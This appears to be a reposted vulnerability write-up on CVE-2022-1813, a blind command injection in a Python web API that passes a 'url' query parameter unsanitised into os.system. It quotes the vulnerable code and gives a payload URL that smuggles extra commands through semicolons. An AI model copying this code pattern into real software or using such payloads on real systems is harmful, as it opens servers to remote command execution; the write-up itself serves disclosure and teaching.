CVE-2022–1813 Blind Command Injection

1 year ago 94
BOOK THIS SPACE FOR AD
ARTICLE AD

This Bug founded by Abdulrahman Abdullah. This is a python based web application in which there is no proper check on url parameter which lead to inject system command.

class CMSDetector(APIView):
def get(self, request):
req = self.request
url = req.query_params.get('url')
#save_db = True if 'save_db' in req.query_params else False
response = {'status': False}
try:
response = get_cms_details(url)
except Exception as e:
response = {'status': False, 'message': str(e)}
return Response(response)

In this code you can see that the parameter url is stored in the variable url and then it used as argument in get_cms_details function as parameter on 8th line. Now lets analyze get_cms_details function

def get_cms_details(url):
# this function will fetch cms details using cms_detector
response = {}
cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)
os.system(cms_detector_command)
response['status'] = False
response['message'] = 'Could not detect CMS!'
parsed_url = urlparse(url)
domain_name = parsed_url.hostname
port = parsed_url.port
find_dir = domain_name
if port:
find_dir += '_{}'.format(port)

print(url)
print(find_dir)

Now in 4th line cms_detector_command variable contain this code 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)'

Lets simplify it . So it will look like this

python3 /usr/src/github/cmseek/cmseek.py -u url — random-agent — batch — follow-redirect

Now if we pass url something just like this url;cmd; so it will be evaluated as 2 different command and the whole code will look like this

python3 /usr/src/github/cmseek/cmseek.py -u url ;cmd;— random-agent — batch — follow-redirect

.1st one is this “python3 /usr/src/github/cmseek/cmseek.py -u url — random-agent — batch — follow-redirect” and 2nd is the command we will pass. Now lets check how can we can construct payload for this command injection

http:///api/tools/cms_detector/?format=json&url=ls;ls;ls

This is the final payload for successful exploitation

Read Entire Article